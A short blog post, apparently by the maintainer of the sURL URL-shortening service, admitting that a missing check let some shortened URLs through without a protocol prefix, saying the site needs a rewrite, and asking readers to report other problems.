* All sURL's should have the protocol prefix, and I could've sworn I'd put in checks for this, but had apparently not ......

Ref:
http://surl.co.uk/?7955

To be perfectly honest, the sURL site is in dire need of a complete re-write, but time is short atm, so thats gonna have to wait for now.

If you find any other problems with the sURL service, please do let me know.

Ref:
http://forum.hosts-file.net/viewtopic.php?f=41&t=707
Posted by MysteryFCM at 16:42
0 comments
Subscribe to: Posts (Atom)